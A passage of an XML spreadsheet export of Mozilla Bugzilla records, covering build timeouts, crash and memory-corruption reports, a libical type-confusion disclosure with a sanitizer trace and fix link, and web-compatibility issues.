        <v>1063797</v>
      </c>
      <c r="B1838" t="inlineStr">
        <is>
          <t>2014-09-05 14:17:46 -0700</t>
        </is>
      </c>
      <c r="C1838" t="inlineStr">
        <is>
          <t>Switch over to new security model</t>
        </is>
      </c>
      <c r="D1838" t="inlineStr">
        <is>
          <t>2014-11-26 12:27:17 -0800</t>
        </is>
      </c>
      <c r="E1838" t="n">
        <v>1</v>
      </c>
      <c r="F1838" t="n">
        <v>1</v>
      </c>
      <c r="G1838" t="n">
        <v>4</v>
      </c>
      <c r="H1838" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1838" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J1838" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K1838" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1838" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1838" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1838" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1838" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1838" t="inlineStr"/>
      <c r="Q1838" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1838" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1838" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1838" t="n">
        <v>1</v>
      </c>
      <c r="U1838" t="n">
        <v>0</v>
      </c>
      <c r="V1838" t="n">
        <v>3</v>
      </c>
      <c r="W1838" t="inlineStr">
        <is>
          <t>This is a tracking bug for the switchover of consumers and publishers to the new system.  I think it should be closed when the public user is finally deleted.</t>
        </is>
      </c>
      <c r="X1838" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1839">
      <c r="A1839" t="n">
        <v>1536194</v>
      </c>
      <c r="B1839" t="inlineStr">
        <is>
          <t>2019-03-18 12:15:07 -0700</t>
        </is>
      </c>
      <c r="C1839" t="inlineStr">
        <is>
          <t>High Frequency OS X cross compiled addon [taskcluster:error] Task timeout after 3600 seconds. Force killing container.</t>
        </is>
      </c>
      <c r="D1839" t="inlineStr">
        <is>
          <t>2022-01-10 04:29:23 -0800</t>
        </is>
      </c>
      <c r="E1839" t="n">
        <v>1</v>
      </c>
      <c r="F1839" t="n">
        <v>1</v>
      </c>
      <c r="G1839" t="n">
        <v>7</v>
      </c>
      <c r="H1839" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1839" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1839" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1839" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1839" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1839" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1839" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1839" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1839" t="inlineStr"/>
      <c r="Q1839" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R1839" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1839" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1839" t="n">
        <v>1</v>
      </c>
      <c r="U1839" t="n">
        <v>0</v>
      </c>
      <c r="V1839" t="n">
        <v>18</v>
      </c>
      <c r="W1839" t="inlineStr">
        <is>
          <t>#[markdown(off)]
Filed by: ncsoregi [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=234564250&amp;repo=mozilla-beta
https://queue.taskcluster.net/v1/task/bi4gsttKRTeMnA5RMjBHMg/runs/0/artifacts/public/logs/live_backing.log
[task 2019-03-18T16:44:08.226Z] 16:44:08     INFO -  Starting Mac pre-processing on file: /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL
[task 2019-03-18T16:44:08.226Z] 16:44:08     INFO -  Running Mac pre-processing on file: /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL
[task 2019-03-18T16:44:08.226Z] 16:44:08     INFO -  /builds/worker/workspace/build/src/build/macosx/llvm-dsymutil --arch=x86_64 /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL
[task 2019-03-18T16:44:08.227Z] 16:44:08     INFO -  warning: could not find referenced DIE
[task 2019-03-18T16:44:08.227Z] 16:44:08     INFO -  note: while processing /builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/release/libgkrust.a(gkrust-9e7e3fc0c5ddbbbd.gkrust.lqkbllc7-cgu.0.rcgu.o)
...
[task 2019-03-18T16:44:22.281Z] 16:44:22     INFO -  note: while processing /builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/release/libgkrust.a(gkrust-9e7e3fc0c5ddbbbd.gkrust.lqkbllc7-cgu.0.rcgu.o)
[task 2019-03-18T16:44:22.281Z] 16:44:22     INFO -  warning: inconsistent range data.
[task 2019-03-18T16:44:22.281Z] 16:44:22     INFO -  note: while processing emitting debug_ranges
[task 2019-03-18T16:44:22.281Z] 16:44:22     INFO -  warning: inconsistent range data.
[task 2019-03-18T16:44:22.281Z] 16:44:22     INFO -  note: while processing emitting debug_ranges
[task 2019-03-18T16:44:22.281Z] 16:44:22     INFO -  warning: inconsistent range data.
[task 2019-03-18T16:44:22.282Z] 16:44:22     INFO -  note: while processing emitting debug_ranges
[task 2019-03-18T16:44:22.282Z] 16:44:22     INFO -  warning: inconsistent range data.
[task 2019-03-18T16:44:22.282Z] 16:44:22     INFO -  note: while processing emitting debug_ranges
[task 2019-03-18T16:44:22.282Z] 16:44:22     INFO -  Finished processing /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL in 143.62s
[task 2019-03-18T16:44:22.282Z] 16:44:22     INFO -  Beginning work for file: /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL
[task 2019-03-18T16:44:22.282Z] 16:44:22     INFO -  Processing file: /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL
[task 2019-03-18T16:44:22.283Z] 16:44:22     INFO -  /builds/worker/workspace/build/src/obj-firefox/dist/host/bin/dump_syms -a x86_64 -g /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL.dSYM /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL
[task 2019-03-18T16:44:22.283Z] 16:44:22     INFO -  PERFHERDER_DATA: {"framework": {"name": "build_metrics"}, "suites": [{"subtests": [{"alertChangeType": "absolute", "name": "num_static_constructors", "value": 84, "alertThreshold": 3}], "name": "compiler_metrics"}]}
[task 2019-03-18T16:44:22.283Z] 16:44:22     INFO -  Finished processing /builds/worker/workspace/build/src/obj-firefox/toolkit/library/XUL in 327.94s
[task 2019-03-18T16:44:22.283Z] 16:44:22     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library'
[task 2019-03-18T16:50:47.864Z] 16:50:47     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:47.865Z] 16:50:47     INFO -  /builds/worker/workspace/build/src/clang/bin/clang++ -isysroot /builds/worker/workspace/build/src/MacOSX10.11.sdk --target=x86_64-darwin11 -Qunused-arguments -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fstack-protector-strong -Qunused-arguments -Wall -Wbitfield-enum-conversion -Wempty-body -Wignored-qualifiers -Woverloaded-virtual -Wpointer-arith -Wshadow-field-in-constructor-modified -Wsign-compare -Wtype-limits -Wunreachable-code -Wunreachable-code-return -Wwrite-strings -Wno-invalid-offsetof -Wclass-varargs -Wfloat-overflow-conversion -Wfloat-zero-conversion -Wloop-analysis -Wc++1z-compat -Wc++2a-compat -Wcomma -Wimplicit-fallthrough -Werror=non-literal-null-conversion -Wstring-conversion -Wtautological-overlap-compare -Wtautological-unsigned-enum-zero-compare -Wtautological-unsigned-zero-compare -Wno-inline-new-delete -Wno-error=deprecated-declarations -Wno-error=array-bounds -Wno-error=return-std-move -Wno-error=atomic-alignment -Wformat -Wformat-security -Wno-gnu-zero-variadic-macro-arguments -Wno-unknown-warning-option -Wno-return-type-c-linkage -fno-sized-deallocation -fcrash-diagnostics-dir=/builds/worker/artifacts -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fstack-protector-strong -fno-exceptions -fno-strict-aliasing -stdlib=libc++ -fno-rtti -ffunction-sections -fdata-sections -fno-exceptions -fno-math-errno -pthread -pipe -g -Xclang -load -Xclang /builds/worker/workspace/build/src/obj-firefox/build/clang-plugin/libclang-plugin.so -Xclang -add-plugin -Xclang moz-check -O3 -fno-omit-frame-pointer -funwind-tables -Werror  -fPIC  -o XUL -Wl,-filelist,/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest/XUL.list  -flto=thin -Wl,-syslibroot,/builds/worker/workspace/build/src/MacOSX10.11.sdk -fstack-protector-strong -framework Cocoa -lobjc -framework AudioToolbox -framework ExceptionHandling '-Wl,-U,_OBJC_CLASS_$_NSTouchBar' '-Wl,-U,_OBJC_CLASS_$_NSSharingServicePickerTouchBarItem' '-Wl,-U,_OBJC_METACLASS_$_NSTouchBar' '-Wl,-U,_OBJC_CLASS_$_NSCustomTouchBarItem' -lresolv -Wl,-executable_path,/builds/worker/workspace/build/src/obj-firefox/dist/bin -Wl,-dead_strip   -Wl,-object_path_lto,XUL.lto.o/ ../../../security/nss/lib/crmf/crmf_crmf/libcrmf.a ../../../js/src/build/libjs_static.a /builds/worker/workspace/build/src/obj-firefox/x86_64-apple-darwin/release/libgkrust_gtest.a ../../../mozglue/build/libmozglue.dylib ../../../security/libnss3.dylib ../../../config/external/lgpllibs/liblgpllibs.dylib -dynamiclib -install_name @executable_path/XUL -compatibility_version 1 -current_version 1 -single_module   -framework IOKit -framework AudioToolbox -framework CoreMedia -framework VideoToolbox -framework Foundation -framework AVFoundation -framework CoreVideo -framework AppKit -framework OpenGL -framework LocalAuthentication -framework Security -lm -framework SystemConfiguration -F/builds/worker/workspace/build/src/MacOSX10.11.sdk/System/Library/PrivateFrameworks -framework CoreUI -framework CoreSymbolication -lcups -Wl,-framework,Foundation -Wl,-framework,CoreFoundation -Wl,-framework,CoreLocation -Wl,-framework,QuartzCore -Wl,-framework,Carbon -Wl,-framework,CoreAudio -Wl,-framework,CoreVideo -Wl,-framework,AudioToolbox -Wl,-framework,AudioUnit -Wl,-framework,AddressBook -Wl,-framework,OpenGL -Wl,-framework,Security -Wl,-framework,ServiceManagement -Wl,-framework,CoreServices -Wl,-framework,ApplicationServices -Wl,-framework,AppKit -framework AudioUnit -framework CoreAudio
[task 2019-03-18T16:50:47.865Z] 16:50:47     INFO -  ld: warning: directory not found for option '-L/builds/worker/workspace/src/obj-firefox'
[task 2019-03-18T16:50:47.865Z] 16:50:47     INFO -  ld: warning: directory not found for option '-L/builds/worker/workspace/src/gcc/lib64'
[task 2019-03-18T16:50:47.865Z] 16:50:47     INFO -  ld: warning: could not create compact unwind for _ffi_call_unix64: does not use RBP or RSP based frame
[task 2019-03-18T16:50:47.866Z] 16:50:47     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  /builds/worker/workspace/build/src/obj-firefox/_virtualenvs/init/bin/python -m mozbuild.action.check_binary --target XUL
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  TEST-PASS | check_nsmodules | XUL
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  chmod +x XUL
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  make[4]: Entering directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  ../../../config/nsinstall -L /builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest -m 644 'XUL' '../../../dist/bin/gtest'
[task 2019-03-18T16:50:52.231Z] 16:50:52     INFO -  make[4]: Leaving directory '/builds/worker/workspace/build/src/obj-firefox/toolkit/library/gtest'
[taskcluster:error] Task timeout after 3600 seconds. Force killing container.
[taskcluster 2019-03-18 16:53:47.518Z] === Task Finished ===
[taskcluster 2019-03-18 16:53:47.518Z] Unsuccessful task run with exit code: -1 completed in 3601.635 seconds</t>
        </is>
      </c>
      <c r="X1839" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" t="n">
        <v>1555646</v>
      </c>
      <c r="B1840" t="inlineStr">
        <is>
          <t>2019-05-30 03:01:58 -0700</t>
        </is>
      </c>
      <c r="C1840" t="inlineStr">
        <is>
          <t>Type confusion in icalproperty.c icaltimezone_get_vtimezone_properties</t>
        </is>
      </c>
      <c r="D1840" t="inlineStr">
        <is>
          <t>2020-08-08 09:37:10 -0700</t>
        </is>
      </c>
      <c r="E1840" t="n">
        <v>1</v>
      </c>
      <c r="F1840" t="n">
        <v>1</v>
      </c>
      <c r="G1840" t="n">
        <v>2</v>
      </c>
      <c r="H1840" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1840" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J1840" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1840" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1840" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1840" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1840" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1840" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1840" t="inlineStr"/>
      <c r="Q1840" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1840" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1840" t="inlineStr">
        <is>
          <t>6.2.7</t>
        </is>
      </c>
      <c r="T1840" t="n">
        <v>1</v>
      </c>
      <c r="U1840" t="n">
        <v>0</v>
      </c>
      <c r="V1840" t="n">
        <v>7</v>
      </c>
      <c r="W1840" t="inlineStr">
        <is>
          <t>Created attachment 9068662
type-confusion.eml
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Steps to reproduce:
Open the attached saved message (type-confusion.eml) in Thunderbird. Receiving this message in my inbox also triggers the bug without further user interaction. The thunderbird process is killed.
Actual results:
A type confusion happens in icaltimezone_get_vtimezone_properties while trying to access a a TZID property of the wrong kind.
The bug manifests with zone-&gt;tzid = strdup (tzid); being called with tzid containing a bad pointer, wich hopefully dereferences a non-mapped address but could point to an arbitrary position when an attacker crafts a malicious ICS file. This situation happens when icaltimezone_get_vtimezone_properties is invoked with a malformed input whose TZID property has the wrong kind (ICAL_FLOAT_VALUE in this case), subsequently trying to access data-&gt;v_string (which is illegal for an ICAL_FLOAT_VALUE object.
The bug is described upstream here https://github.com/libical/libical/issues/263 as "The problem was that the parser allowed any valid value type to be parsed, regardless of whether it was legal for the given property, and the code accessing the property value was assuming the default type.". 
```
Asan report:
==16790==ERROR: AddressSanitizer: SEGV on unknown address 0x000300000000 (pc 0x7fab68e575a1 bp 0x7ffc1d697530 sp 0x7ffc1d696cb8 T0)
==16790==The signal is caused by a READ memory access.
    #0 0x7fab68e575a0  /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:59
    #1 0x471c2f in strdup (/opt/out/thunderbird_libical_fuzzer+0x471c2f)
    #2 0x597b10 in icaltimezone_get_location_from_vtimezone /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icaltimezone.c:311:13
    #3 0x597b10 in icaltimezone_get_vtimezone_properties /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icaltimezone.c:292
    #4 0x598697 in icaltimezone_array_append_from_vtimezone /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icaltimezone.c:1281:9
    #5 0x561c09 in icalcomponent_add_component /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalcomponent.c:572:2
    #6 0x57e647 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:767:6
    #7 0x57db2f in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:622:11
    #8 0x5623a3 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1235:9
    #9 0x55fa56 in LLVMFuzzerTestOneInput /opt/src/fuzzer.cc:13:38
    #10 0x43103d in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/out/thunderbird_libical_fuzzer+0x43103d)
    #11 0x420aaa in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/out/thunderbird_libical_fuzzer+0x420aaa)
    #12 0x42b9e8 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/out/thunderbird_libical_fuzzer+0x42b9e8)
    #13 0x41d712 in main (/opt/out/thunderbird_libical_fuzzer+0x41d712)
    #14 0x7fab68ceab96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #15 0x41d749 in _start (/opt/out/thunderbird_libical_fuzzer+0x41d749)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:59
```
Expected results:
No heap overflow nor corruption.
A fix can be found here https://github.com/libical/libical/commit/53e68ff6e2133c54ff44df53e8b75ef21125fb3d.</t>
        </is>
      </c>
      <c r="X1840" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" t="n">
        <v>1380377</v>
      </c>
      <c r="B1841" t="inlineStr">
        <is>
          <t>2017-07-12 10:13:20 -0700</t>
        </is>
      </c>
      <c r="C1841" t="inlineStr">
        <is>
          <t>sync-illustration.svg is loaded but not shown at browser startup</t>
        </is>
      </c>
      <c r="D1841" t="inlineStr">
        <is>
          <t>2017-09-02 08:50:24 -0700</t>
        </is>
      </c>
      <c r="E1841" t="n">
        <v>1</v>
      </c>
      <c r="F1841" t="n">
        <v>1</v>
      </c>
      <c r="G1841" t="n">
        <v>2</v>
      </c>
      <c r="H1841" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1841" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1841" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1841" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1841" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1841" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1841" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1841" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1841" t="inlineStr">
        <is>
          <t>[reserve-photon-performance]</t>
        </is>
      </c>
      <c r="Q1841" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1841" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1841" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1841" t="n">
        <v>1</v>
      </c>
      <c r="U1841" t="n">
        <v>1</v>
      </c>
      <c r="V1841" t="n">
        <v>24</v>
      </c>
      <c r="W1841" t="inlineStr">
        <is>
          <t>According to our new browser_startup_image.js test, sync-illustration.svg is loaded during browser startup but not shown. For startup performance and memory usage, we should avoid loading images that aren't going to be displayed.</t>
        </is>
      </c>
      <c r="X1841" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" t="n">
        <v>530966</v>
      </c>
      <c r="B1842" t="inlineStr">
        <is>
          <t>2009-11-24 18:08:52 -0800</t>
        </is>
      </c>
      <c r="C1842" t="inlineStr">
        <is>
          <t>New crash [@ nsDownloadScanner::~nsDownloadScanner()] in Firefox 3.6b3</t>
        </is>
      </c>
      <c r="D1842" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:50 -0700</t>
        </is>
      </c>
      <c r="E1842" t="n">
        <v>1</v>
      </c>
      <c r="F1842" t="n">
        <v>1</v>
      </c>
      <c r="G1842" t="n">
        <v>3</v>
      </c>
      <c r="H1842" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1842" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1842" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K1842" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1842" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1842" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1842" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1842" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1842" t="inlineStr"/>
      <c r="Q1842" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1842" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1842" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T1842" t="n">
        <v>1</v>
      </c>
      <c r="U1842" t="n">
        <v>0</v>
      </c>
      <c r="V1842" t="n">
        <v>16</v>
      </c>
      <c r="W1842" t="inlineStr">
        <is>
          <t>There's a new crash in Firefox 3.6b3 with the signature "nsDownloadScanner::~nsDownloadScanner()" that hasn't been seen in any of the versions 3\.5.*. So far we've seen 29+ of these crashes in the wild.
Please see http://crash-stats.mozilla.com/query/query?product=Firefox&amp;version=Firefox%3A3.6b3&amp;range_value=1&amp;range_unit=weeks&amp;query_search=signature&amp;query_type=exact&amp;query=nsDownloadScanner%3A%3A%7EnsDownloadScanner%28%29&amp;do_query=1 for more crash info.</t>
        </is>
      </c>
      <c r="X1842" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1843">
      <c r="A1843" t="n">
        <v>764296</v>
      </c>
      <c r="B1843" t="inlineStr">
        <is>
          <t>2012-06-13 01:31:21 -0700</t>
        </is>
      </c>
      <c r="C1843" t="inlineStr">
        <is>
          <t>memory corruption of strings</t>
        </is>
      </c>
      <c r="D1843" t="inlineStr">
        <is>
          <t>2012-08-13 16:24:42 -0700</t>
        </is>
      </c>
      <c r="E1843" t="n">
        <v>1</v>
      </c>
      <c r="F1843" t="n">
        <v>1</v>
      </c>
      <c r="G1843" t="n">
        <v>3</v>
      </c>
      <c r="H1843" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1843" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1843" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1843" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1843" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1843" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1843" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1843" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1843" t="inlineStr">
        <is>
          <t>[js:p1:fx16][advisory-tracking+][qa?] fixed by bug 765297</t>
        </is>
      </c>
      <c r="Q1843" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1843" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1843" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1843" t="n">
        <v>1</v>
      </c>
      <c r="U1843" t="n">
        <v>0</v>
      </c>
      <c r="V1843" t="n">
        <v>27</v>
      </c>
      <c r="W1843" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.54 Safari/536.5
Steps to reproduce:
1. Load http://bill.dojotoolkit.org/1.7/ffMemoryCorruption.html.   (I'll also attach the test case, but it requires dojo to run, so the URL is simpler.)
2. Click the "add another tab" button repeatedly until the tabs overflow and a down arrow button appears on the upper right of the TabContainer.
3. Repeatedly click the down arrow button to display a menu of tabs, and click choices on the menu to navigate between tabs.
Actual results:
Eventually the menu tab navigation will stop working (usually after two or three times). 
In console (firebug or builtin web console) do this to see the root of the problem:
  contentTabs.getChildren().map(function(f){ return f.id; }).join(", ")
It shows corruption in the ids:
[17:15:15.289] "acceptProposedCo, kanji-characters-etc-here (bugzilla won't let me input them) \x00\x00\x00\x00\x00\x00₀A\x00\x00\x00\x00 ...
Note: occurs on both mac and windows, from version 8 to 14 and possibly earlier versions too.
Expected results:
The id's shouldn't change, they should be plain english strings:
[17:27:56.750] "NeweditorLayout1, NeweditorLayout2, NeweditorLayout3"</t>
        </is>
      </c>
      <c r="X1843" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1844">
      <c r="A1844" t="n">
        <v>1099553</v>
      </c>
      <c r="B1844" t="inlineStr">
        <is>
          <t>2014-11-15 02:30:02 -0800</t>
        </is>
      </c>
      <c r="C1844" t="inlineStr">
        <is>
          <t>odnoklassniki.ru sends desktop site to Firefox Android</t>
        </is>
      </c>
      <c r="D1844" t="inlineStr">
        <is>
          <t>2024-03-07 12:37:51 -0800</t>
        </is>
      </c>
      <c r="E1844" t="n">
        <v>1</v>
      </c>
      <c r="F1844" t="n">
        <v>1</v>
      </c>
      <c r="G1844" t="n">
        <v>2</v>
      </c>
      <c r="H1844" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1844" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J1844" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K1844" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1844" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1844" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1844" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1844" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1844" t="inlineStr">
        <is>
          <t>[country-ru] [serversniff] [contactready] [platform-rel-Odnoklassniki]</t>
        </is>
      </c>
      <c r="Q1844" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1844" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1844" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1844" t="n">
        <v>1</v>
      </c>
      <c r="U1844" t="n">
        <v>0</v>
      </c>
      <c r="V1844" t="n">
        <v>6</v>
      </c>
      <c r="W1844" t="inlineStr">
        <is>
          <t>Possibly they need to fix the browser detection logic.</t>
        </is>
      </c>
      <c r="X1844" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1845">
      <c r="A1845" t="n">
        <v>1247236</v>
      </c>
      <c r="B1845" t="inlineStr">
        <is>
          <t>2016-02-10 04:16:52 -0800</t>
        </is>
      </c>
      <c r="C1845" t="inlineStr">
        <is>
          <t>UAF in Cameras Shutdown on channel errors</t>
        </is>
      </c>
      <c r="D1845" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:40 -0700</t>
        </is>
      </c>
      <c r="E1845" t="n">
        <v>1</v>
      </c>
      <c r="F1845" t="n">
        <v>1</v>
      </c>
      <c r="G1845" t="n">
        <v>3</v>
      </c>
      <c r="H1845" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1845" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1845" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1845" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1845" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1845" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1845" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
